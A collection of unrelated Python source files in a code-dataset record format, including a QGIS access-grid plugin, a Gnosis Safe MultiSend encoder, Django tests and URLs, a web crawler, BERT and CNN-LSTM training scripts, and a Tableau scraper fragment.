# Constants used to refer to parameters and outputs. They will be\n # used when calling the algorithm from another algorithm, or when\n # calling from the QGIS console.\n\n ROADS_LAYER = 'ROADS_LAYER'\n ORIGINS_LAYER = 'ORIGINS_LAYER'\n ORIGIN_VERT_ID_FIELD = 'ORIGIN_VERT_ID_FIELD'\n GRID_LAYER = 'GRID_LAYER'\n GRID_VERT_ID_FIELD = 'GRID_VERT_ID_FIELD'\n BUDGET = 'BUDGET'\n STRESS = 'STRESS'\n OUT_LAYER = 'OUT_LAYER'\n\n\n def help(self):\n html = markdown2.markdown_path(os.path.join(self.helpPath,'Access Grid.md'))\n return True, html\n\n\n def defineCharacteristics(self):\n \"\"\"Here we define the inputs and output of the algorithm, along\n with some other properties.\n \"\"\"\n\n # The name that the user will see in the toolbox\n self.name = 'Access grid'\n\n # The branch of the toolbox under which the algorithm will appear\n #self.group = 'Algorithms for vector layers'\n self.group = 'Network Analysis'\n\n # Input roads layer. Must be line type\n # It is a mandatory (not optional) one, hence the False argument\n self.addParameter(\n ParameterVector(\n self.ROADS_LAYER,\n self.tr('Roads layer (must have a network built)'),\n [ParameterVector.VECTOR_TYPE_LINE],\n optional=False\n )\n )\n\n # Input origins layer. Must be point type\n # Required\n self.addParameter(\n ParameterVector(\n self.ORIGINS_LAYER,\n self.tr('Origins layer (must have network vertex IDs)'),\n [ParameterVector.VECTOR_TYPE_POINT],\n optional=False\n )\n )\n\n # Origins field with vertex IDs\n # Required\n self.addParameter(\n ParameterTableField(\n self.ORIGIN_VERT_ID_FIELD,\n self.tr('Origin field containing the network vertex IDs'),\n parent=self.ORIGINS_LAYER,\n datatype = ParameterTableField.DATA_TYPE_NUMBER,\n optional=False\n )\n )\n\n # Input grid layer. Must be polygon type\n # Required\n self.addParameter(\n ParameterVector(\n self.GRID_LAYER,\n self.tr('Grid layer (must have vertex IDs)'),\n [ParameterVector.VECTOR_TYPE_POLYGON],\n optional=False\n )\n )\n\n # Grid field with vertex IDs\n # Required\n self.addParameter(\n ParameterTableField(\n self.GRID_VERT_ID_FIELD,\n self.tr('Grid field containing the network vertex IDs'),\n parent=self.GRID_LAYER,\n datatype = ParameterTableField.DATA_TYPE_NUMBER,\n optional=False\n )\n )\n\n # Max travel budget\n # Required\n self.addParameter(\n ParameterNumber(\n self.BUDGET,\n self.tr('Maximum travel budget (in cost units)'),\n minValue=0,\n optional=False\n )\n )\n\n # Max stress\n # Required\n self.addParameter(\n ParameterNumber(\n self.STRESS,\n self.tr('Maximum allowable traffic stress'),\n minValue=1,maxValue=4,\n optional=False\n )\n )\n\n\n # Output raw layer\n self.addOutput(\n OutputVector(self.OUT_LAYER, self.tr('Output'))\n )\n\n\n def processAlgorithm(self, progress):\n progress.setPercentage(0)\n # Retrieve the values of the parameters entered by the user\n inLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.ROADS_LAYER))\n originsLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.ORIGINS_LAYER))\n oVertIdField = self.getParameterValue(self.ORIGIN_VERT_ID_FIELD)\n gridLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.GRID_LAYER))\n gVertIdField = self.getParameterValue(self.GRID_VERT_ID_FIELD)\n stress = self.getParameterValue(self.STRESS)\n budget = self.getParameterValue(self.BUDGET)\n\n # build the output layer\n gridFields = QgsFields()\n gridFields.append(QgsField('id', QVariant.Int))\n gridFields.append(QgsField('origin_id', QVariant.Int))\n gridFields.append(QgsField('grid_id', QVariant.Int))\n gridFields.append(QgsField('car_cost', QVariant.Int))\n gridFields.append(QgsField('bike_cost', QVariant.Int))\n gridFields.append(QgsField('conn_idx', QVariant.Double))\n gridWriter = self.getOutputFromName(self.OUT_LAYER).getVectorWriter(\n gridFields, QGis.WKBPolygon, inLayer.crs())\n\n progress.setPercentage(2)\n\n # establish db connection\n progress.setInfo('Getting DB connection')\n self.setDbFromRoadsLayer(inLayer)\n self.setLayersFromDb()\n if self.vertsLayer is None or self.linksLayer is None:\n raise GeoAlgorithmExecutionException('Could not find related \\\n network tables. Have you built the network tables on \\\n layer %s?' % inLayer.name())\n progress.setPercentage(3)\n\n # get network\n progress.setInfo('Building network')\n nu = NXUtils(self.vertsLayer,self.linksLayer)\n nu.buildNetwork()\n DG = nu.getNetwork()\n # if not stress:\n # stress = 99\n SG = nu.getStressNetwork(stress)\n progress.setPercentage(10)\n\n # loop through the grid features and get distances to origins for each\n count = 0\n totalCount = len(vector.features(originsLayer))\n idStep = 0\n for originFeat in vector.features(originsLayer):\n originVertId = originFeat.attribute(oVertIdField)\n\n # skip if node is not accessible by low stress\n if not originVertId in SG:\n continue\n\n # get shortest path\n pathsBase = nx.single_source_dijkstra_path_length(\n DG,\n source=originVertId,\n cutoff=budget,\n weight='weight'\n )\n\n # get shortest low stress path\n pathsLowStress = nx.single_source_dijkstra_path_length(\n SG,\n source=originVertId,\n cutoff=budget,\n weight='weight'\n )\n\n # loop through grid and establish features\n for gridFeat in vector.features(gridLayer):\n gridVertId = gridFeat.attribute(gVertIdField)\n if gridVertId in pathsLowStress:\n if gridVertId in pathsBase:\n carCost = pathsBase[gridVertId]\n else:\n carCost = None\n bikeCost = pathsLowStress[gridVertId]\n connIdx = float()\n if carCost is None:\n connIdx = 1\n elif carCost == 0:\n connIdx = 1\n else:\n connIdx = float(bikeCost)/float(carCost)\n outFeat = QgsFeature(gridFields)\n outFeat.setAttribute(0,idStep) #feature id\n outFeat.setAttribute(1,originFeat.id()) #origin_id\n outFeat.setAttribute(2,gridFeat.id()) #grid_id\n outFeat.setAttribute(3,carCost) #car_cost\n outFeat.setAttribute(4,bikeCost) #bike_cost\n outFeat.setAttribute(5,connIdx) #conn_idx\n outGeom = QgsGeometry(gridFeat.geometry())\n outFeat.setGeometry(outGeom)\n idStep += 1\n gridWriter.addFeature(outFeat)\n\n count += 1\n progress.setPercentage(10+int(90*float(count)/totalCount))\n\n del gridWriter\n","sub_path":"TDGAlgorithmProviderPlugin/AccessGrid.py","file_name":"AccessGrid.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"236464239","text":"import curses\nimport time\nimport game_objects as go\nimport utils\nfrom threading import Thread\nimport cfg\n\n\nwindow = curses.initscr()\ncurses.cbreak()\ncurses.noecho()\nwindow.timeout(cfg.TIME_MOVE_SET)\n\nfield = go.Field()\nbrick = go.Brick()\n\n\ndef auto_down():\n while True:\n time.sleep(cfg.TIME_SLEEP)\n global brick, field, window\n brick.control_brick(ord(\"s\"), field)\n can_down = utils.check_valid(field, brick)\n if not can_down:\n brick.revert()\n field.add_brick(brick)\n brick = go.brick()\n field.check_and_clear_rows()\n # render screen\n rendered = utils.create_screen(field, brick)\n window.refresh()\n window.addstr(0, 0, rendered)\n\n\ndef move(key):\n global brick, field, window\n window.clear()\n window.refresh()\n brick.control_brick(key, field)\n\n # check valid move or not\n valid = utils.check_valid(field, brick)\n if not valid:\n brick.revert()\n\n # check_get floor\n brick.control_brick(ord(\"s\"), field)\n can_down = utils.check_valid(field, brick)\n brick.revert()\n if not can_down:\n field.add_brick(brick)\n brick.create_new_brick()\n\n # clear one row when full\n field.check_and_clear_rows()\n\n # render screen\n rendered = utils.create_screen(field, brick)\n window.addstr(0, 0, rendered)\n\n\ndef move_set(keys_list):\n global window\n move(keys_list[0])\n for key in keys_list[1:]:\n window.getch()\n move(key)\n\n\nwhile True:\n window.getch()\n keys_list = utils.get_moveset(field, brick)\n utils.gen_data(field, brick, keys_list)\n move_set(keys_list)\n","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560105880","text":"from enum import Enum\nfrom logging import getLogger\nfrom typing import Any, Dict, List\n\nfrom eth_account.signers.local import LocalAccount\nfrom hexbytes import HexBytes\nfrom web3 import Web3\n\nfrom gnosis.eth import EthereumClient\nfrom gnosis.eth.contracts import get_multi_send_contract\nfrom gnosis.eth.ethereum_client import EthereumTxSent\n\nlogger = getLogger(__name__)\n\n\nclass MultiSendOperation(Enum):\n CALL = 0\n DELEGATE_CALL = 1\n\n\nclass MultiSendTx:\n def __init__(self, operation: MultiSendOperation, address: str, value: int, data: bytes):\n self.operation = operation\n self.address = address\n self.value = value\n self.data = data\n\n def __eq__(self, other):\n if not isinstance(other, MultiSendTx):\n return NotImplemented\n\n return (self.operation == other.operation and self.address == other.address\n and self.value == other.value and self.data == other.data)\n\n @classmethod\n def from_bytes(cls, encoded_multisend_tx: bytes):\n operation = MultiSendOperation(encoded_multisend_tx[0])\n address = Web3.toChecksumAddress(encoded_multisend_tx[1:1 + 20])\n value = int.from_bytes(encoded_multisend_tx[21:21 + 32], byteorder='big')\n # data_lenght = int.from_bytes(encoded_multisend_tx[21 + 32: 21 + 32 * 2], byteorder='big)\n data = encoded_multisend_tx[21 + 32 * 2:]\n return cls(operation, address, value, data)\n\n @property\n def encoded_data(self):\n multisend_operation = HexBytes('{:0>2x}'.format(self.operation.value)) # Operation 1 byte\n multisend_address = HexBytes('{:0>40x}'.format(int(self.address, 16))) # Address 20 bytes\n multisend_value = HexBytes('{:0>64x}'.format(self.value)) # Value 32 bytes\n data_lenght = HexBytes('{:0>64x}'.format(len(self.data))) # Data length 32 bytes\n return multisend_operation + multisend_address + multisend_value + data_lenght + self.data\n\n\nclass MultiSend:\n def __init__(self, address: str, ethereum_client: EthereumClient):\n assert Web3.isChecksumAddress(address), \\\n '%s proxy factory address not valid' % address\n\n self.address = address\n self.ethereum_client = ethereum_client\n self.w3 = ethereum_client.w3\n\n @staticmethod\n def deploy_contract(ethereum_client: EthereumClient, deployer_account: LocalAccount) -> EthereumTxSent:\n \"\"\"\n Deploy proxy factory contract\n :param ethereum_client:\n :param deployer_account: Ethereum Account\n :return: deployed contract address\n \"\"\"\n contract = get_multi_send_contract(ethereum_client.w3)\n tx = contract.constructor().buildTransaction({'from': deployer_account.address})\n\n tx_hash = ethereum_client.send_unsigned_transaction(tx, private_key=deployer_account.key)\n tx_receipt = ethereum_client.get_transaction_receipt(tx_hash, timeout=120)\n assert tx_receipt.status\n contract_address = tx_receipt.contractAddress\n logger.info(\"Deployed and initialized Proxy Factory Contract=%s by %s\", contract_address,\n deployer_account.address)\n return EthereumTxSent(tx_hash, tx, contract_address)\n\n def get_contract(self):\n return get_multi_send_contract(self.ethereum_client.w3, self.address)\n\n def build_tx_data(self, multi_send_txs: List[MultiSendTx]) -> bytes:\n \"\"\"\n Txs don't need to be valid to get through\n :param multi_send_txs:\n :param sender:\n :return:\n \"\"\"\n multisig_contract = self.get_contract()\n encoded_multisend_data = b''.join([x.encoded_data for x in multi_send_txs])\n return multisig_contract.functions.multiSend(encoded_multisend_data).buildTransaction({'gas': 1,\n 'gasPrice': 1})['data']\n","sub_path":"gnosis/safe/multi_send.py","file_name":"multi_send.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158869443","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport scipy as sp\n\n# function for picture compressing\ndef picture_compress(k):\n \n # copy the sigma so that no influence of previous\n r1 = Sigma_r.copy()\n g1 = Sigma_g.copy()\n b1 = Sigma_b.copy()\n \n # keep the rest k onwards non zero elements to zero\n r1[k:800] = np.zeros_like(Sigma_r[k:800])\n g1[k:800] = np.zeros_like(Sigma_g[k:800])\n b1[k:800] = np.zeros_like(Sigma_b[k:800])\n \n # change dimension for dot multiplication\n r2 = sp.linalg.diagsvd(r1,800,1000)\n g2 = sp.linalg.diagsvd(g1,800,1000)\n b2 = sp.linalg.diagsvd(b1,800,1000)\n \n # dot multiplication for new matrix\n r_new = np.dot(np.dot(U_r,r2), V_r)\n g_new = np.dot(np.dot(U_g,g2), V_g)\n b_new = np.dot(np.dot(U_b,b2), V_b)\n \n # new matrix image plotting\n img[:,:,0] = r_new\n img[:,:,1] = g_new\n img[:,:,2] = b_new\n \n fig2 = plt.figure(k)\n ax1 = fig2.add_subplot(2,2,1)\n ax2 = fig2.add_subplot(2,2,2)\n ax3 = fig2.add_subplot(2,2,3)\n ax4 = fig2.add_subplot(2,2,4)\n ax1.imshow(img)\n ax2.imshow(r, cmap = 'Reds')\n ax3.imshow(g, cmap = 'Greens')\n ax4.imshow(b, cmap = 'Blues')\n plt.show()\n\n# Load picture, split into 3 matrices for red, green and blue components\n# and display the three components\nimg=mpimg.imread('chelsea.png')\n[r,g,b] = [img[:,:,i] for i in range(3)]\n\nfig = plt.figure(1)\nax1 = fig.add_subplot(2,2,1)\nax2 = fig.add_subplot(2,2,2)\nax3 = fig.add_subplot(2,2,3)\nax4 = fig.add_subplot(2,2,4)\nax1.imshow(img)\nax2.imshow(r, cmap = 'Reds')\nax3.imshow(g, cmap = 'Greens')\nax4.imshow(b, cmap = 'Blues')\nplt.show()\n\n# Sigma, U and V for reds, greens and blues\nU_r, Sigma_r, V_r = sp.linalg.svd(r)\nU_g, Sigma_g, V_g = sp.linalg.svd(g)\nU_b, Sigma_b, V_b = sp.linalg.svd(b)\n\n# None zero elements in Sigma for reds, greens and blues\nnonzero_Sigma_r = np.count_nonzero(Sigma_r)\nnonzero_Sigma_g = np.count_nonzero(Sigma_g)\nnonzero_Sigma_b = np.count_nonzero(Sigma_b)\nprint(\"The non zero elements in Sigma are \",nonzero_Sigma_r,\" for red, \"\n ,nonzero_Sigma_g, \" for green and \",nonzero_Sigma_b, \" for blue\")\n \n \npicture_compress(30)\n\npicture_compress(200)","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39891255","text":"from django import test\nfrom django.contrib.auth import models as auth_models\n\nfrom api import models\n\n\nclass TestApi(test.TestCase):\n def setUp(self):\n super(TestApi, self).setUp()\n self.users = [\n auth_models.User.objects.create_user(\n username='user1',\n password='password1'\n )\n ]\n self.messages = [\n models.Message(\n text='First message!',\n author=self.users[0],\n )\n ]\n for message in self.messages:\n message.save()\n\n def test_message_list(self):\n resp = self.client.get('/api/v0/messages/')\n self.assertEqual(200, resp.status_code)\n content = resp.json()\n self.assertIsInstance(content, list)\n self.assertEqual(len(self.messages), len(content))\n self.assertEqual(self.messages[0].text, content[0]['text'])\n","sub_path":"api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"315035882","text":"# Function to check the Minimum and maximum number in an array\ndef find_max_min(list_main):\n \n #First check to assertain variables are equal\n if all(a == list_main [0] for a in list_main) == True: \n list_2 = []\n list_2.append(len(list_main))\n \n #Returning the length of the list\n return list_2 \n \n else:\n #Find the maximum value\n max_val = max(list_main) \n \n #Find the minimum value\n min_val = min(list_main) \n \n #Then we combine maximum and minimum values to a list and return the list\n max_min = [] \n max_min.append(min_val)\n max_min.append(max_val) \n return max_min\n","sub_path":"max_min_num.py","file_name":"max_min_num.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589872899","text":"\"\"\"university_management_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\n 'api/accounts/',\n include(\n ('apps.accounts.urls', 'accounts'),\n namespace='accounts'\n )\n ),\n path(\n 'api/teachers/',\n include(\n ('apps.teachers.urls', 'teachers'),\n namespace='teachers'\n )\n ),\n path(\n 'api/regulations/',\n include(\n ('apps.regulations.urls', 'regulations'),\n namespace='regulations'\n )\n ),\n path(\n 'api/contents/',\n include(\n ('apps.contents.urls', 'contents'),\n namespace='contents'\n )\n ),\n]\n\nurlpatterns += static(\n settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT\n)\n\nurlpatterns += static(\n settings.STATIC_URL,\n document_root=settings.STATIC_ROOT\n)\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486946768","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# Created on 2017-09-06 15:52:25\n# Project: newv2ex\n\nfrom pyspider.libs.base_handler import *\n\n\nclass Handler(BaseHandler):\n crawl_config = {\n }\n\n @every(minutes=24 * 60)\n def on_start(self):\n self.crawl('https://www.v2ex.com/', callback=self.index_page)\n\n @config(age=10 * 24 * 60 * 60)\n def index_page(self, response):\n for each in response.doc('a[href^=\"https://www.v2ex.com/?tab=\"]').items():\n self.crawl(each.attr.href, callback=self.tab_page)\n @config(priority=2)\n def tab_page(self, response):\n return {\n \"url\": response.url,\n \"title\": response.doc('title').text(),\n }\n\n @config(priority=2)\n def detail_page(self, response):\n return {\n \"url\": response.url,\n \"title\": response.doc('title').text(),\n }\n","sub_path":"pySpider/v2ex.py","file_name":"v2ex.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615412855","text":"import json\nimport torch\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom transformers import BertForSequenceClassification\n\n\n# Function to read configuration file\ndef read_config_file(file):\n js = open(file).read()\n config = json.loads(js)\n\n return config\n\n\n# Function to initialize configuration for REST API\ndef initialize_api():\n config = read_config_file('config-api.json')\n label_dict = config[\"label-dict\"]\n\n return config, label_dict\n\n\n# Function to initialize system to train and test model\ndef initialize():\n config = read_config_file('config.json')\n \n # read csv and add names to columns\n df = pd.read_csv(config['csv-file'],\n dtype = str,\n header = 0, \n index_col = 'id',\n usecols = ['id', 'processed_tweet', 'emotion'])\n\n print(df.head())\n print(df.emotion.value_counts())\n\n # remove empty processed tweets\n df = df[~df.processed_tweet.isnull()]\n\n print(df.emotion.value_counts())\n print(\"TOTAL :\", len(df))\n \n # plot the dataset after the undersampling\n plt.figure(figsize=(8, 8))\n sns.countplot('emotion', data=df)\n plt.show()\n\n # enumerate categories\n possible_labels = sorted(df.emotion.unique())\n\n label_dict = {}\n for index, possible_label in enumerate(possible_labels):\n label_dict[possible_label] = index\n\n df['label'] = df.emotion.replace(label_dict)\n\n print(df.head())\n label_dict = dict(sorted(label_dict.items()))\n print(label_dict)\n \n return df, label_dict, config\n\n\n# Function to load saved pretrained model\ndef load_pretrained_model(bert, label_dict, config):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n model = BertForSequenceClassification.from_pretrained(config[\"bert-model\"][bert],\n num_labels = len(label_dict),\n output_attentions = False,\n output_hidden_states = False)\n\n model.to(device)\n model.load_state_dict(torch.load(config[\"model\"][bert], map_location=torch.device('cpu')))\n\n return model\n\n\n# Function to load model for the REST API\ndef load_model(bert):\n config, label_dict = initialize_api()\n loaded_model = load_pretrained_model(bert, label_dict, config)\n return loaded_model, config, label_dict","sub_path":"Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201104772","text":"\nfrom __future__ import print_function\n\nimport sys\nimport cv2\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import rnn, rnn_cell\n#from tensorflow.contrib import rnn\n#from tensorflow.contrib.rnn.python.ops import core_rnn\n\nimport numpy as np\n\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\nnp.random.seed(2323)\n\nexp = 43\n\nTRAIN_SIZE = 1000\nTEST_SIZE = 200\nNUM_MAX = int((TRAIN_SIZE+TEST_SIZE)/TEST_SIZE)\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('dataset', '../screenshot/scsho_txt/rnn'+str(43)+'.txt', 'File name of data dir')\n\n# Parameters\nlearning_rate = 0.0001\n\nmax_epoch = 1000\nbatch_size = 20\n\nCALC_BATCH = 100\n\nSAVE_MODEL_STEP = 100\n\n\nn_input_row = 48 \nn_input_col = 48\nn_steps = 10\n\n#CNN\nn_fc1 = 1024\nn_fc2 = 256\n\nn_hidden = 128 # hidden layer num of features\n\nn_classes = 2 # MNIST total classes (0-9 digits)\n\nimages_placeholder = tf.placeholder(\"float\", [None, n_steps, n_input_row*n_input_col*3])\nlabels_placeholder = tf.placeholder(\"float\", [None, n_steps, n_classes])\n\n\n# 重みを標準偏差0.1の正規分布で初期化\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n# バイアスを標準偏差0.1の正規分布で初期化\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n#CNN\n# Define weights\nweights = {\n #CNN\n 'W_conv1': weight_variable([5, 5, 3, 32]),\n 'W_conv2': weight_variable([5, 5, 32, 64]),\n 'W_fc1': weight_variable([int(n_input_row/4*n_input_col/4*64), n_fc1]),\n 'out': weight_variable([n_hidden, n_classes]) \n}\n\nbiases = {\n #CNN\n 'b_conv1': bias_variable([32]),\n 'b_conv2': bias_variable([64]),\n 'b_fc1': bias_variable([n_fc1]),\n 'out': bias_variable([n_classes]) \n}\n\ndef LRCN(images_placeholder, weights, biases, keep_prob1, keep_prob2, keep_prob3, keep_prob4, keep_prob5, keep_prob6, keep_prob7):\n # Prepare data shape to match `rnn` function requirements\n # Current data input shape: (batch_size, n_steps, n_input)\n # Required shape: 'n_steps' tensors list of shape (batch_size, n_input)\n\n # Permuting batch_size and n_steps\n images_placeholder = tf.transpose(images_placeholder, [1, 0, 2])\n # Reshaping to (n_steps*batch_size, n_input)\n images_placeholder = tf.reshape(images_placeholder, [-1, n_input_row*n_input_col*3])\n # Split to get a list of 'n_steps' tensors of shape (batch_size, n_input)\n #images_placeholder = tf.split(0, n_steps, images_placeholder)\n images_placeholder = tf.split(images_placeholder, n_steps, 0)\n \n \n #CNN\n \n # 畳み込み層の作成\n def conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n # プーリング層の作成\n def max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],strides=[1, 2, 2, 1], padding='SAME')\n \n lstm_input = []\n \n for time_step in range(n_steps):\n # 入力を28x28x1に変形\n x_image = tf.reshape(images_placeholder[time_step], [-1, n_input_row, n_input_col, 3])\n \n # 畳み込み層1\n with tf.name_scope('conv1') as scope:\n x_image_drop = tf.nn.dropout(x_image, keep_prob1)\n h_conv1 = tf.nn.relu(conv2d(x_image_drop, weights['W_conv1']) + biases['b_conv1'])\n\n # プーリング層1\n with tf.name_scope('pool1') as scope:\n h_conv1_drop = tf.nn.dropout(h_conv1, keep_prob2)\n h_pool1 = max_pool_2x2(h_conv1_drop)\n\n # 畳み込み層2\n with tf.name_scope('conv2') as scope:\n h_pool1_drop = tf.nn.dropout(h_pool1, keep_prob3)\n h_conv2 = tf.nn.relu(conv2d(h_pool1_drop, weights['W_conv2']) + biases['b_conv2'])\n\n # プーリング層2\n with tf.name_scope('pool2') as scope:\n h_conv2_drop = tf.nn.dropout(h_conv2, keep_prob4)\n h_pool2 = max_pool_2x2(h_conv2_drop)\n \n # 全結合層1\n with tf.name_scope('fc1') as scope:\n h_pool2_flat = tf.reshape(h_pool2, [-1,int(n_input_row/4*n_input_col/4*64)])\n h_pool2_flat_drop = tf.nn.dropout(h_pool2_flat,keep_prob5)\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat_drop, weights['W_fc1']) + biases['b_fc1'])\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob6)#\n\n lstm_input.append(h_fc1_drop)\n \n \n #RNN\n \n # Define a lstm cell with tensorflow\n lstm_cell = rnn_cell.BasicLSTMCell(n_hidden, forget_bias=1.0)\n #lstm_cell = rnn.BasicLSTMCell(n_hidden) \n \n # Get lstm cell output\n #outputs, states = rnn.rnn(lstm_cell, lstm_input, dtype=tf.float32)\n outputs, states = rnn.static_rnn(lstm_cell, lstm_input, dtype=tf.float32)\n \n #線形活性(time_steps分の出力)\n out = []\n for time_step in range(n_steps):\n out_uni = tf.matmul(outputs[time_step], weights['out']) + biases['out']\n out_uni_drop = tf.nn.dropout(out_uni, keep_prob7)\n out.append(out_uni_drop)\n \n out = tf.transpose(out, [1, 0, 2]) \n return out\n\n\ndef loss(pred, labels_placeholder):\n #error = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\n error = tf.reduce_mean(tf.square(pred-labels_placeholder))\n \n return error\n\n\n# ファイルを開く\nf = open(FLAGS.dataset, 'r')\n# データを入れる配列\ndataset_image = []\ndataset_label = []\nprint(\"...loading dataset\")\nfor line in f:\n # 改行を除いてスペース区切りにする\n line = line.rstrip()\n l = line.split()\n # 画像読み込み\n img = cv2.imread(l[0])\n #正方形にトリミング\n img = img[:,400-240:400+240]\n img = cv2.resize(img, (n_input_row, n_input_col))\n # 一列にした後、0-1のfloat値にする\n dataset_image.append(img.flatten().astype(np.float32)/255.0)\n\n x = float(l[1])\n y = float(l[3])\n z = float(l[2])\n angle = float(l[4])\n pitch = float(l[5])\n \n #クラス2:位置のみ推定\n tmp = np.zeros(n_classes)\n tmp[0] = x\n tmp[1] = y\n dataset_label.append(tmp)\n #sys.exit()\n \nf.close()\n\ndataset_image = np.asarray(dataset_image)\ndataset_label = np.asarray(dataset_label)\n\n#print (len(dataset_image))\n#print (len(dataset_label))\nDATA_SIZE = len(dataset_image)\n\nif DATA_SIZE%n_steps!=0:\n print (\"MY_ERROR : DATA_SIZE_SEQ\")\n sys.exit()\n\nDATA_SIZE_SEQ = int(DATA_SIZE/n_steps)\n#print (DATA_SIZE_SEQ)#1200\n#print (len(dataset_image))#12000\n#print (len(dataset_image[0]))#6912\n#sys.exit()\n\ndataset_image = dataset_image.reshape((DATA_SIZE_SEQ,n_steps,n_input_row*n_input_col*3))\n#print (len(dataset_image))#1200\n#print (len(dataset_image[0]))#10\n#print (len(dataset_image[0][0]))#48*48*3\n\ndataset_label = dataset_label.reshape((DATA_SIZE_SEQ,n_steps,n_classes))\n#print (len(dataset_label))#1200\n#print (len(dataset_label[0]))#10\n#print (len(dataset_label[0][0]))#2\n\ndataset_image = np.asarray(dataset_image)\ndataset_label = np.asarray(dataset_label)\n\nkeep_prob1 = tf.placeholder(\"float\")\nkeep_prob2 = tf.placeholder(\"float\")\nkeep_prob3 = tf.placeholder(\"float\")\nkeep_prob4 = tf.placeholder(\"float\")\nkeep_prob5 = tf.placeholder(\"float\")\nkeep_prob6 = tf.placeholder(\"float\")\nkeep_prob7 = tf.placeholder(\"float\")\n\npred = LRCN(images_placeholder, weights, biases, keep_prob1, keep_prob2, keep_prob3, keep_prob4, keep_prob5, keep_prob6, keep_prob7)\n\n#sys.exit()\n\n# Define loss and optimizer\n#cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\ncost = loss(pred, labels_placeholder)\n#cost = tf.reduce_mean(tf.square(pred-y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\n#correct_pred = tf.equal(tf.argmax(pred,2), tf.argmax(y,2))\n#accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n# Initializing the variables\n#init = tf.initialize_all_variables()\n\n# 保存の準備\nsaver = tf.train.Saver(max_to_keep = 0)\n\n#sys.exit()\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\n# Launch the graph\nwith tf.Session(config=config) as sess:\n \n num = 0\n while num 0) and\n (\"commandReturn\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0]) and\n (\"underlyingDataTable\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"]) and\n (\"dataDictionary\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"][\"underlyingDataTable\"]) and\n (\"dataSegments\" in cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][0][\"commandReturn\"][\"underlyingDataTable\"][\"dataDictionary\"])):\n dataSegments = cmdResponse[\"vqlCmdResponse\"][\"cmdResultList\"][\n 0][\"commandReturn\"][\"underlyingDataTable\"][\"dataDictionary\"][\"dataSegments\"]\n dataSegmentscp = copy.deepcopy(dataSegments)\n keys = list(dataSegmentscp.keys())\n for key in keys:\n if dataSegmentscp[key] is not None:\n self._scraper.dataSegments[key] = dataSegmentscp[key]\n else:\n self._scraper.logger.warning(\n f\"no data dictionary present in response\")\n\n def getColumns(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n return [\n t[\"fieldCaption\"]\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True\n )\n ]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n return [\n t[\"fieldCaption\"]\n for t in tableauscraper.utils.getIndicesInfo(\n 